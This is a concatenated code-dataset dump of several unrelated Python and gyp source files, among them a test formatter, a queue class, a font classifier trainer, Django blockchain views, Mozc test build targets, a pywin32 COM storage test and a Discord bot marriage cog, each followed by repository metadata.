self.stream.write(arg_format.text(arg.original))
line_length += len(arg.original)
text_start = arg.end
if text_start != len(step_name):
text = step_name[text_start:]
self.stream.write(text_format.text(text))
line_length += (len(text))
if self.show_source:
location = six.text_type(location)
if self.show_timings and status in (Status.passed, Status.failed):
location += " %0.3fs" % step.duration
location = self.indented_text(location, proceed)
self.stream.write(self.format("comments").text(location))
line_length += len(location)
elif self.show_timings and status in (Status.passed, Status.failed):
timing = "%0.3fs" % step.duration
timing = self.indented_text(timing, proceed)
self.stream.write(self.format("comments").text(timing))
line_length += len(timing)
self.stream.write("\n")
self.step_lines = int((line_length - 1) / self.display_width)
if self.show_multiline:
if step.text:
self.doc_string(step.text)
if step.table:
self.table(step.table)
def print_tags(self, tags, indentation):
if not tags:
return
line = " ".join("@" + tag for tag in tags)
self.stream.write(indentation + line + "\n")
def print_comments(self, comments, indentation):
if not comments:
return
self.stream.write(indent([c.value for c in comments], indentation))
self.stream.write("\n")
def print_description(self, description, indentation, newline=True):
if not description:
return
self.stream.write(indent(description, indentation))
if newline:
self.stream.write("\n")
| 34.640751
| 83
| 0.565978
|
794e1e2b6541885954f585ef3260d03ceacd3528
| 1,463
|
py
|
Python
|
uqueue.py
|
aerodesic/MeshSemtech
|
2b59c30559309326f48f8562b6a98b43032941d2
|
[
"MIT"
] | 1
|
2020-02-17T11:12:51.000Z
|
2020-02-17T11:12:51.000Z
|
uqueue.py
|
aerodesic/MeshSemtech
|
2b59c30559309326f48f8562b6a98b43032941d2
|
[
"MIT"
] | null | null | null |
uqueue.py
|
aerodesic/MeshSemtech
|
2b59c30559309326f48f8562b6a98b43032941d2
|
[
"MIT"
] | null | null | null |
from ulock import *
class QueueException(Exception):
pass
class queue():
def __init__(self, maxlen=0):
self._maxlen = maxlen
self._lock = lock()
self._fill = lock(True)
self._queue = []
def __len__(self):
with self._lock:
return len(self._queue)
def put(self, item):
with self._lock:
if self._maxlen != 0 and len(self._queue) >= self._maxlen:
raise QueueException("full")
self._queue.append(item)
if self._fill.locked():
self._fill.release()
# Return head of queue or None if empty
def head(self):
with self._lock:
return self._queue[0] if len(self._queue) != 0 else None
# Return tail of queue or None if empty
def tail(self):
with self._lock:
return self._queue[-1] if len(self._queue) != 0 else None
def get(self, wait=1):
self._lock.acquire()
if wait:
while len(self._queue) == 0:
# Wait for something
self._lock.release()
self._fill.acquire()
self._lock.acquire()
if len(self._queue) != 0:
item = self._queue.pop(0)
found = True
else:
item = None
found = False
self._lock.release()
if wait and not found:
raise QueueException("empty")
return item
| 23.983607
| 70
| 0.524949
|
794e1f68d12d08b12f3a8762577a46adccdd3f4a
| 5,927
|
py
|
Python
|
train_classifier.py
|
abekoh/dcgan_font
|
85c8580ae8aaeee9b9a10793063f02fe45067894
|
[
"MIT"
] | null | null | null |
train_classifier.py
|
abekoh/dcgan_font
|
85c8580ae8aaeee9b9a10793063f02fe45067894
|
[
"MIT"
] | null | null | null |
train_classifier.py
|
abekoh/dcgan_font
|
85c8580ae8aaeee9b9a10793063f02fe45067894
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
import cv2
import chainer
from chainer import cuda
from chainer import optimizers
from chainer import FunctionSet
from chainer import Variable
from chainer import serializers
from chainer import functions as F
from chainer import links as L
from mylib.chainer import dataset
from mylib import tools
import models
def train(train_txt_path, test_txt_path, dst_dir_path, epoch_n=100, batch_size=128, model=models.Classifier_AlexNet()):
'''
Classifierの学習
Args:
train_txt_path: 学習に用いる画像のパスを記載したtxt.
1列目は画像パス,2列目はクラスID('A'から順に0,1,2...)
ex) /home/hoge/font/A/0.png, 0
/home/hoge/font/B/0.png, 1
/home/hoge/font/C/0.png, 2
/home/hoge/2.png, 0
test_txt_path: テストに用いる画像のパスを記載したtxt.
フォーマットはtrain_txt_pathと同じ.
dst_dir_path: 学習済みモデルの出力先.
epoch_n: 学習回数.
batch_size: バッチサイズ.
model: Classifierの学習済みモデルのパス.(models.pyのクラス)
'''
train_imgs, train_labels = dataset.filelist_to_list(train_txt_path)
test_imgs, test_labels = dataset.filelist_to_list(test_txt_path)
xp = cuda.cupy
cuda.get_device(0).use()
model.to_gpu()
optimizer = optimizers.SGD(lr=0.01)
optimizer.setup(model)
optimizer.add_hook(chainer.optimizer.WeightDecay(0.0005))
train_imgs_n = train_imgs.shape[0]
test_imgs_n = test_imgs.shape[0]
for epoch_i in range(epoch_n):
print('epoch:{0}/{1}'.format(epoch_i, epoch_n))
perm = np.random.permutation(train_imgs_n)
train_sum_acc = 0
train_sum_loss = 0
test_sum_acc = 0
test_sum_loss = 0
for batch_i in range(0, train_imgs_n, batch_size):
optimizer.zero_grads()
batched_imgs = xp.asarray(train_imgs[perm[batch_i: batch_i + batch_size]])
batched_labels = xp.asarray(train_labels[perm[batch_i: batch_i + batch_size]])
batched_imgs_score = model(Variable(batched_imgs))
loss = F.softmax_cross_entropy(
batched_imgs_score, Variable(batched_labels))
acc = F.accuracy(batched_imgs_score, Variable(batched_labels))
loss.backward()
optimizer.update()
train_sum_loss += float(loss.data.get()) * batch_size
train_sum_acc += float(acc.data.get()) * batch_size
for batch_i in range(0, test_imgs_n, batch_size):
batched_imgs = xp.asarray(test_imgs[batch_i: batch_i + batch_size])
batched_labels = xp.asarray(test_labels[batch_i: batch_i + batch_size])
batched_imgs_score = model(Variable(batched_imgs))
loss = F.softmax_cross_entropy(
batched_imgs_score, Variable(batched_labels))
acc = F.accuracy(batched_imgs_score, Variable(batched_labels))
test_sum_loss += float(loss.data.get()) * batch_size
test_sum_acc += float(acc.data.get()) * batch_size
print('train: loss={0}, accuracy={1}'.format(train_sum_loss / train_imgs_n, train_sum_acc / train_imgs_n))
print('test: loss={0}, accuracy={1}'.format(test_sum_loss / test_imgs_n, test_sum_acc / test_imgs_n))
serializers.save_hdf5('{0}model_{1}.hdf5'.format(dst_dir_path, epoch_i), model)
serializers.save_hdf5('{0}state_{1}.hdf5'.format(dst_dir_path, epoch_i), optimizer)
def classify(src_png_path, classifier):
'''
クラス分別の実行
Args:
src_png_path: 分別する画像のパス
classifier: Classifierのモデルの構造(models.pyのクラス)
Return:
predict_label: 分別されたラベル(クラスID)
'''
img = cv2.imread(src_png_path, -1)
img = img.astype(np.float32)
img /= 255
img = img[np.newaxis, np.newaxis, :, :]
x = Variable(img)
y = classifier.predictor(x)
max_score = 0
for i, score in enumerate(y.data[0]):
if score > max_score:
max_score = score
predict_label = i
return predict_label
def output_accuracy_rate(img_paths, labels,
model=models.Classifier_AlexNet(),
hdf5_path='/home/abe/dcgan_font/classificator_alex.hdf5'):
'''
正解率の出力
Args:
img_paths: 対象の画像のパス
labels: 対象の画像の正解ラベル
model: Classifierのモデルの構造(models.pyのクラス)
hdf5_path: Classifierの学習済みモデルのパス
'''
serializers.load_hdf5(hdf5_path, model)
classifier = L.Classifier(model)
correct_n = 0
for img_path, label in zip(img_paths, labels):
if label == classify(img_path, classifier):
print(img_path, '正解')
correct_n += 1
else:
print(img_path, '不正解')
accuracy_rate = float(correct_n) / float(len(img_paths))
print ('correct_n:', correct_n)
print (accuracy_rate)
def debug():
# # train
# train_txt_path = '/home/abe/font_dataset/png_6628_64x64/train_noise.txt'
# test_txt_path = '/home/abe/font_dataset/png_6628_64x64/test_noise.txt'
# dst_dir_path = tools.make_date_dir('/home/abe/dcgan_font/output_classificator/debug/')
# train(train_txt_path, test_txt_path, dst_dir_path, model=models.Classifier(noise=True))
# classify
# print (classify('/home/abe/font_dataset/png_6628_64x64/B/3239.png'))
# output_accuracy_rate
path_tmp1 = '/home/abe/dcgan_font/output_storage/forPRMU/CNN_Test/plusclassifier/'
img_paths, labels = [], []
for alph in ['A', 'B', 'C', 'D']:
path_tmp2 = path_tmp1 + alph + '_'
for i in range(2500):
img_path = path_tmp2 + str(i) + '.png'
img_paths.append(img_path)
labels.append(ord(alph) - 65)
output_accuracy_rate(img_paths, labels)
if __name__ == '__main__':
debug()
| 36.58642
| 119
| 0.625612
|
794e2015bfe7de13c7e6b0a303f593f02933205d
| 3,980
|
py
|
Python
|
rexchain/blockchain/views.py
|
Prescrypto/RexChain
|
abf4bb8d0ec3c906221224ba82b77cfac8b06eca
|
[
"Apache-2.0"
] | 3
|
2021-04-16T21:53:41.000Z
|
2021-05-18T07:28:47.000Z
|
rexchain/blockchain/views.py
|
Prescrypto/RexChain
|
abf4bb8d0ec3c906221224ba82b77cfac8b06eca
|
[
"Apache-2.0"
] | 34
|
2018-10-11T17:16:44.000Z
|
2021-09-08T00:31:57.000Z
|
rexchain/blockchain/views.py
|
Prescrypto/RexChain
|
abf4bb8d0ec3c906221224ba82b77cfac8b06eca
|
[
"Apache-2.0"
] | 1
|
2019-05-07T20:11:55.000Z
|
2019-05-07T20:11:55.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
# Python libs
import json
import logging
# Django packages
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.views.generic import View
# Our Models
from django.conf import settings
from .models import Payload, Block, Transaction
# Blockcypher
from api.views import PayloadSerializer
logger = logging.getLogger('django_info')
class ValidateRxView(View):
''' Validate PoE of one Transaction with a block
poe.received Date of stampd
poe.poe_url Url of PoE
poe.hash Hash of PoE Transaction
poe.data_hex Data Hex
merkle_root Merkle Root of block
'''
template = "blockchain/validate.html"
def get(self, request, *args, **kwargs):
hash_id = kwargs.get("hash_id")
payload = tx = None
template = "blockchain/validate.html"
try:
payload = Payload.objects.get(hash_id=hash_id)
tx = payload.transaction
except Exception as e:
logger.info("[Validate ERROR]:{} type:{}".format(e, type(e)))
# Try to get from transaction ID
try:
tx = Transaction.objects.get(txid=hash_id)
except Exception as e:
_message_error = "[Validate ERROR] Neither hash is from Payload nor Transaction:{} type:{}"
logger.error(_message_error.format(e, type(e)))
return redirect("/")
return render(request, template, {"tx": tx})
def glossary(request):
''' Proof of existence explanation '''
return render(request, "blockchain/glossary.html")
def tx_detail(request, hash_id=False):
''' Get a hash and return the blockchain model '''
if request.GET.get("hash_id", False):
hash_id = request.GET.get("hash_id")
if hash_id:
context = dict()
try:
rx = Payload.objects.get(hash_id=hash_id)
except: # noqa : F841
try:
rx = Payload.objects.get(transaction__txid=hash_id)
except Exception as e:
logger.error("Error :{}, type({})".format(e, type(e)))
return redirect("/block/?block_hash={}".format(hash_id))
_payload = PayloadSerializer(rx)
context.update({
"rx": rx,
"payload": json.dumps(_payload.data, sort_keys=True, indent=4, ensure_ascii=False),
})
return render(request, "blockchain/rx_detail.html", context)
return redirect("/")
def rx_priv_key(request, hash_rx=False):
# Temporary way to show key just for test, remove later
try:
rx = Payload.objects.get(hash_id=hash_rx)
return HttpResponse(rx.get_priv_key, content_type="text/plain")
except Exception as e: # noqa: F841
return HttpResponse("Not Found", content_type="text/plain")
def block_detail(request, block_hash=False):
''' Get a hash and return the block'''
if request.GET.get("block_hash", False):
block_hash = request.GET.get("block_hash")
if block_hash:
context = {}
try:
block = Block.objects.get(hash_block=block_hash)
context["block_object"] = block
if block.poetxid == "True":
context["message_poe"] = "PoE en proceso"
elif block.poetxid == "False" or block.poetxid.strip() == "":
context["message_poe"] = "Sin PoE por el momento"
elif block.poetxid == "Genesis":
context["message_poe"] = "Block Genesis"
else:
# Create URL
context["poe_url"] = "{}/dash/tx/{}/".format(settings.BASE_POE_URL, block.poetxid)
context["message_poe"] = "PoE válida"
return render(request, "blockchain/block_detail.html", context)
except Exception as e:
logger.error("Error found: {}, type: {}".format(e, type(e)))
return redirect("/")
| 33.445378
| 107
| 0.61005
|
794e202247e07930e6dc69151ffef0dc8f934318
| 11,507
|
gyp
|
Python
|
src/session/session_test.gyp
|
KawaneRio/mozc
|
215e669e6fdac2040a28dd3f97cfa0910ee4c9df
|
[
"BSD-3-Clause"
] | 1,144
|
2015-04-23T16:18:45.000Z
|
2022-03-29T19:37:33.000Z
|
src/session/session_test.gyp
|
KawaneRio/mozc
|
215e669e6fdac2040a28dd3f97cfa0910ee4c9df
|
[
"BSD-3-Clause"
] | 291
|
2015-05-04T07:53:37.000Z
|
2022-03-22T00:09:05.000Z
|
src/session/session_test.gyp
|
KawaneRio/mozc
|
215e669e6fdac2040a28dd3f97cfa0910ee4c9df
|
[
"BSD-3-Clause"
] | 301
|
2015-05-03T00:07:18.000Z
|
2022-03-21T10:48:29.000Z
|
# Copyright 2010-2021, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
{
'variables': {
'relative_dir': 'session',
'gen_out_dir': '<(SHARED_INTERMEDIATE_DIR)/<(relative_dir)',
},
'targets': [
{
'target_name': 'session_handler_test_util',
'type' : 'static_library',
'sources': [
'session_handler_test_util.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../config/config.gyp:config_handler',
'../engine/engine.gyp:engine_factory',
'../engine/engine.gyp:mock_data_engine_factory',
'../protocol/protocol.gyp:commands_proto',
'../protocol/protocol.gyp:config_proto',
'../testing/testing.gyp:testing',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session',
'session.gyp:session_handler',
'session.gyp:session_usage_observer',
],
},
{
'target_name': 'session_server_test',
'type': 'executable',
'sources': [
'session_server_test.cc',
],
'dependencies': [
'../testing/testing.gyp:gtest_main',
'session.gyp:session',
'session.gyp:session_server',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_test',
'type': 'executable',
'sources': [
'session_test.cc',
],
'dependencies': [
'../converter/converter_base.gyp:converter_mock',
'../data_manager/testing/mock_data_manager.gyp:mock_data_manager',
'../engine/engine.gyp:engine',
'../engine/engine.gyp:mock_converter_engine',
'../engine/engine.gyp:mock_data_engine_factory',
'../rewriter/rewriter.gyp:rewriter',
'../testing/testing.gyp:gtest_main',
'../testing/testing.gyp:mozctest',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_regression_test',
'type': 'executable',
'sources': [
'session_regression_test.cc',
],
'dependencies': [
'../data_manager/testing/mock_data_manager.gyp:mock_data_manager',
'../engine/engine.gyp:mock_data_engine_factory',
'../testing/testing.gyp:gtest_main',
'session.gyp:session',
'session.gyp:session_server',
],
'variables': {
'test_size': 'large',
},
},
{
'target_name': 'session_handler_test',
'type': 'executable',
'sources': [
'session_handler_test.cc',
],
'dependencies': [
'../base/base_test.gyp:clock_mock',
'../converter/converter_base.gyp:converter_mock',
'../engine/engine.gyp:mock_converter_engine',
'../testing/testing.gyp:gtest_main',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session',
'session.gyp:session_server',
'session_handler_test_util',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_converter_test',
'type': 'executable',
'sources': [
'session_converter_test.cc',
],
'dependencies': [
'../converter/converter_base.gyp:converter_mock',
'../data_manager/testing/mock_data_manager.gyp:mock_data_manager',
'../testing/testing.gyp:gtest_main',
'../testing/testing.gyp:testing_util',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session',
'session_base.gyp:request_test_util',
],
},
{
'target_name': 'session_module_test',
'type': 'executable',
'sources': [
'output_util_test.cc',
'session_observer_handler_test.cc',
'session_usage_observer_test.cc',
'session_usage_stats_util_test.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../base/base_test.gyp:clock_mock',
'../base/base_test.gyp:scheduler_stub',
'../client/client.gyp:client_mock',
'../config/config.gyp:config_handler',
'../config/config.gyp:stats_config_util',
'../protocol/protocol.gyp:commands_proto',
'../testing/testing.gyp:gtest_main',
'../usage_stats/usage_stats_base.gyp:usage_stats',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session_handler',
'session.gyp:session_usage_observer',
'session_base.gyp:keymap',
'session_base.gyp:keymap_factory',
'session_base.gyp:output_util',
'session_base.gyp:session_usage_stats_util',
],
'variables': {
'test_size': 'small',
},
},
{
# iOS is not supported.
'target_name': 'session_watch_dog_test',
'type': 'executable',
'sources': [
'session_watch_dog_test.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../client/client.gyp:client_mock',
'../testing/testing.gyp:gtest_main',
'session.gyp:session_watch_dog',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_key_handling_test',
'type': 'executable',
'sources': [
'ime_switch_util_test.cc',
'key_info_util_test.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../config/config.gyp:config_handler',
'../protocol/protocol.gyp:commands_proto',
'../testing/testing.gyp:gtest_main',
'session_base.gyp:ime_switch_util',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_internal_test',
'type': 'executable',
'sources': [
'internal/candidate_list_test.cc',
'internal/ime_context_test.cc',
'internal/keymap_test.cc',
'internal/keymap_factory_test.cc',
'internal/session_output_test.cc',
'internal/key_event_transformer_test.cc',
],
'dependencies': [
'../base/base.gyp:base',
'../converter/converter_base.gyp:converter_mock',
'../engine/engine.gyp:mock_converter_engine',
'../protocol/protocol.gyp:commands_proto',
'../protocol/protocol.gyp:config_proto',
'../testing/testing.gyp:gtest_main',
'../testing/testing.gyp:testing_util',
'session.gyp:session',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_handler_stress_test',
'type': 'executable',
'sources': [
'session_handler_stress_test.cc'
],
'dependencies': [
'../engine/engine.gyp:engine_factory',
'../testing/testing.gyp:gtest_main',
'session.gyp:random_keyevents_generator',
'session.gyp:session',
'session.gyp:session_handler_tool',
'session.gyp:session_server',
'session_handler_test_util',
],
'variables': {
'test_size': 'large',
},
},
{
'target_name': 'random_keyevents_generator_test',
'type': 'executable',
'sources': [
'random_keyevents_generator_test.cc',
],
'dependencies': [
'../protocol/protocol.gyp:commands_proto',
'../testing/testing.gyp:gtest_main',
'session.gyp:random_keyevents_generator',
],
'variables': {
'test_size': 'large',
},
},
{
'target_name': 'session_converter_stress_test',
'type': 'executable',
'sources': [
'session_converter_stress_test.cc'
],
'dependencies': [
'../engine/engine.gyp:mock_data_engine_factory',
'../testing/testing.gyp:gtest_main',
'session.gyp:session',
],
'variables': {
'test_size': 'large',
},
},
{
'target_name': 'request_test_util_test',
'type': 'executable',
'sources': [
'request_test_util_test.cc'
],
'dependencies': [
'../base/base.gyp:base',
'../testing/testing.gyp:gtest_main',
'session_base.gyp:request_test_util',
],
'variables': {
'test_size': 'small',
},
},
{
'target_name': 'session_handler_scenario_test',
'type': 'executable',
'sources': [
'session_handler_scenario_test.cc'
],
'dependencies': [
'../base/absl.gyp:absl_status',
'../base/base.gyp:base',
'../data/test/session/scenario/scenario.gyp:install_session_handler_scenario_test_data',
'../data/test/session/scenario/usage_stats/usage_stats.gyp:install_session_handler_usage_stats_scenario_test_data',
'../engine/engine.gyp:mock_data_engine_factory',
'../protocol/protocol.gyp:candidates_proto',
'../protocol/protocol.gyp:commands_proto',
'../testing/testing.gyp:gtest_main',
'../testing/testing.gyp:mozctest',
'../usage_stats/usage_stats_test.gyp:usage_stats_testing_util',
'session.gyp:session_handler',
'session.gyp:session_handler_tool',
'session_base.gyp:request_test_util',
'session_handler_test_util',
],
'variables': {
'test_size': 'large',
},
},
# Test cases meta target: this target is referred from gyp/tests.gyp
{
'target_name': 'session_all_test',
'type': 'none',
'dependencies': [
'random_keyevents_generator_test',
'request_test_util_test',
'session_converter_stress_test',
'session_converter_test',
'session_handler_scenario_test',
'session_handler_stress_test',
'session_handler_test',
'session_key_handling_test',
'session_internal_test',
'session_module_test',
'session_regression_test',
'session_server_test',
'session_test',
'session_watch_dog_test',
],
'conditions': [
],
},
],
}
| 32.597734
| 123
| 0.607717
|
794e20d5e43a481ab209b0e7f79b23da36df45c3
| 6,184
|
py
|
Python
|
Src/StdLib/Lib/site-packages/win32com/test/testPersist.py
|
cwensley/ironpython2
|
f854444e1e08afc8850cb7c1a739a7dd2d10d32a
|
[
"Apache-2.0"
] | 1,078
|
2016-07-19T02:48:30.000Z
|
2022-03-30T21:22:34.000Z
|
Src/StdLib/Lib/site-packages/win32com/test/testPersist.py
|
cwensley/ironpython2
|
f854444e1e08afc8850cb7c1a739a7dd2d10d32a
|
[
"Apache-2.0"
] | 576
|
2017-05-21T12:36:48.000Z
|
2022-03-30T13:47:03.000Z
|
Src/StdLib/Lib/site-packages/win32com/test/testPersist.py
|
cwensley/ironpython2
|
f854444e1e08afc8850cb7c1a739a7dd2d10d32a
|
[
"Apache-2.0"
] | 269
|
2017-05-21T04:44:47.000Z
|
2022-03-31T16:18:13.000Z
|
import pythoncom
import win32com.server.util
import time
import win32com, sys, string, win32api, traceback
import win32com.client.dynamic
import win32com.client
import pythoncom
from win32com.axcontrol import axcontrol
from pywintypes import Unicode
from win32com import storagecon
from win32com.test.util import CheckClean
import pywintypes
import win32ui
import win32api, os
S_OK = 0
class LockBytes:
_public_methods_ = [ 'ReadAt', 'WriteAt', 'Flush', 'SetSize', 'LockRegion', 'UnlockRegion', 'Stat' ]
_com_interfaces_ = [ pythoncom.IID_ILockBytes ]
def __init__(self, data = ""):
self.data = data
now = pywintypes.Time(time.time())
self.ctime = now
self.mtime = now
self.atime = now
def ReadAt(self, offset, cb):
print "ReadAt"
result = self.data[offset:offset + cb]
return result
def WriteAt(self, offset, data):
print "WriteAt " +str(offset)
print "len " + str(len(data))
print "data:"
#print data
if len(self.data) >= offset:
newdata = self.data[0:offset] + data
print len(newdata)
if len(self.data) >= offset + len(data):
newdata = newdata + self.data[offset + len(data):]
print len(newdata)
self.data = newdata
return len(data)
def Flush(self, whatsthis=0):
print "Flush" + str(whatsthis)
fname = os.path.join(win32api.GetTempPath(), "persist.doc")
open(fname, "wb").write(self.data)
return S_OK
def SetSize(self, size):
print "Set Size" + str(size)
if size > len(self.data):
self.data = self.data + "\000" * (size - len(self.data))
else:
self.data = self.data[0:size]
return S_OK
def LockRegion(self, offset, size, locktype):
print "LockRegion"
pass
def UnlockRegion(self, offset, size, locktype):
print "UnlockRegion"
pass
def Stat(self, statflag):
print "returning Stat " + str(statflag)
return (
"PyMemBytes",
storagecon.STGTY_LOCKBYTES,
len(self.data),
self.mtime,
self.ctime,
self.atime,
storagecon.STGM_DIRECT|storagecon.STGM_READWRITE|storagecon.STGM_CREATE ,
storagecon.STGM_SHARE_EXCLUSIVE,
"{00020905-0000-0000-C000-000000000046}",
0, # statebits ?
0
)
class OleClientSite:
_public_methods_ = [ 'SaveObject', 'GetMoniker', 'GetContainer', 'ShowObject', 'OnShowWindow', 'RequestNewObjectLayout' ]
_com_interfaces_ = [ axcontrol.IID_IOleClientSite ]
def __init__(self, data = ""):
self.IPersistStorage = None
self.IStorage = None
def SetIPersistStorage(self, IPersistStorage):
self.IPersistStorage = IPersistStorage
def SetIStorage(self, IStorage):
self.IStorage = IStorage
def SaveObject(self):
print "SaveObject"
if self.IPersistStorage != None and self.IStorage != None:
self.IPersistStorage.Save(self.IStorage,1)
self.IStorage.Commit(0)
return S_OK
def GetMoniker(self, dwAssign, dwWhichMoniker):
print "GetMoniker " + str(dwAssign) + " " + str(dwWhichMoniker)
def GetContainer(self):
print "GetContainer"
def ShowObject(self):
print "ShowObject"
def OnShowWindow(self, fShow):
print "ShowObject" + str(fShow)
def RequestNewObjectLayout(self):
print "RequestNewObjectLayout"
def test():
# create a LockBytes object and
#wrap it as a COM object
# import win32com.server.dispatcher
lbcom = win32com.server.util.wrap(LockBytes(), pythoncom.IID_ILockBytes) #, useDispatcher=win32com.server.dispatcher.DispatcherWin32trace)
# create a structured storage on the ILockBytes object
stcom = pythoncom.StgCreateDocfileOnILockBytes(lbcom, storagecon.STGM_DIRECT| storagecon.STGM_CREATE | storagecon.STGM_READWRITE | storagecon.STGM_SHARE_EXCLUSIVE, 0)
# create our ClientSite
ocs = OleClientSite()
# wrap it as a COM object
ocscom = win32com.server.util.wrap(ocs, axcontrol.IID_IOleClientSite)
# create a Word OLE Document, connect it to our site and our storage
oocom=axcontrol.OleCreate("{00020906-0000-0000-C000-000000000046}",
axcontrol.IID_IOleObject,
0,
(0,),
ocscom,
stcom,
)
mf=win32ui.GetMainFrame()
hwnd=mf.GetSafeHwnd()
# Set the host and document name
# for unknown reason document name becomes hostname, and document name
# is not set, debugged it, but don't know where the problem is?
oocom.SetHostNames("OTPython", "This is Cool")
# activate the OLE document
oocom.DoVerb( -1, ocscom, 0, hwnd, mf.GetWindowRect())
# set the hostnames again
oocom.SetHostNames("OTPython2", "ThisisCool2")
# get IDispatch of Word
doc=win32com.client.Dispatch(oocom.QueryInterface(pythoncom.IID_IDispatch))
# get IPersistStorage of Word
dpcom=oocom.QueryInterface(pythoncom.IID_IPersistStorage)
# let our ClientSite know the interfaces
ocs.SetIPersistStorage(dpcom)
ocs.SetIStorage(stcom)
# use IDispatch to do the Office Word test
# pasted from TestOffice.py
wrange = doc.Range()
for i in range(10):
wrange.InsertAfter("Hello from Python %d\n" % i)
paras = doc.Paragraphs
for i in range(len(paras)):
paras[i]().Font.ColorIndex = i+1
paras[i]().Font.Size = 12 + (4 * i)
# XXX - note that
# for para in paras:
# para().Font...
# doesnt seem to work - no error, just doesnt work
# Should check if it works for VB!
dpcom.Save(stcom, 0)
dpcom.HandsOffStorage()
# oocom.Close(axcontrol.OLECLOSE_NOSAVE) # or OLECLOSE_SAVEIFDIRTY, but it fails???
#Save the ILockBytes data to "persist2.doc"
lbcom.Flush()
#exiting Winword will automatically update the ILockBytes data
#and flush it to "%TEMP%\persist.doc"
doc.Application.Quit()
if __name__=='__main__':
test()
pythoncom.CoUninitialize()
CheckClean()
| 30.165854
| 170
| 0.645052
|
794e2241cfb748c4cff837583b25783cc4587e40
| 14,835
|
py
|
Python
|
modules/marriage.py
|
CapnS/uwu-bot
|
3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04
|
[
"MIT"
] | null | null | null |
modules/marriage.py
|
CapnS/uwu-bot
|
3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04
|
[
"MIT"
] | null | null | null |
modules/marriage.py
|
CapnS/uwu-bot
|
3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
from discord.ext.commands import cooldown
from discord.ext.commands.cooldowns import BucketType
import time
import asyncio
import asyncpg
from datetime import datetime, timezone, timedelta
from utils import errorhandler
from random import randint, choice
heartt = "<:heartt:521071307769774080>"
broken_heartt = "<:brokenheartt:521074570707468308>"
caution = "<:caution:521002590566219776>"
class marriage(commands.Cog):
def __init__(self, bot):
self.bot = bot
async def cog_check(self, ctx):
if await self.bot.pool.fetchrow(
"SELECT user_id FROM user_settings WHERE user_id = $1", ctx.author.id
):
return True
raise (errorhandler.hasUwU(ctx))
@commands.command(descritpion="Marry your lover.", brief="Marry someone")
async def marry(self, ctx, lover: discord.Member = None):
async with self.bot.pool.acquire() as conn:
if lover is None or lover is ctx.author:
return await ctx.send("Trying to marry yourself...", delete_after=30)
if (
await conn.fetchrow(
"SELECT user_id FROM user_settings WHERE user_id = $1", lover.id
)
is None
):
return await ctx.send(
f"{lover.name} does not have an uwulonian.", delete_after=30
)
if await conn.fetchrow(
"SELECT user1_id, user2_id FROM marriages WHERE user1_id = $1 OR user2_id = $1 OR user1_id = $2 OR user2_id = $2",
ctx.author.id,
lover.id,
):
return await ctx.send(
"Either you or the person you are trying to marry is already married...",
delete_after=30,
)
msg = await ctx.send(
f"""{lover.name} would you like to marry {ctx.author.name}. Reply "I do" to marry. Reply "No" to decline the marriage. This will timeout after 30 seconds."""
)
def check(amsg):
return amsg.author == lover
try:
choice = await self.bot.wait_for("message", timeout=30, check=check)
except asyncio.TimeoutError:
return await msg.edit(
content=f"{lover.name} does not want to marry you."
)
if choice.content.lower() == "i do":
await conn.execute(
"INSERT INTO marriages (user1_id,user2_id) VALUES ($1,$2)",
ctx.author.id,
lover.id,
)
await msg.delete()
return await ctx.send(
f"{lover.mention} has accepted {ctx.author.mention}'s proposal {heartt}"
)
if choice.content.lower() == "no":
await msg.delete()
return await ctx.send(
f"{ctx.author.mention} your lover ({lover.mention}) declined your marriage! There's a million fish in the sea though."
)
else:
await msg.edit(
content="Invalid choice. Did you type it properly?", delete_after=30
)
@commands.command(description="Divorce...", brief="Divorce")
async def divorce(self, ctx):
async with self.bot.pool.acquire() as conn:
if (
await conn.fetchrow(
"SELECT user1_id, user2_id FROM marriages WHERE user1_id = $1 OR user2_id = $1",
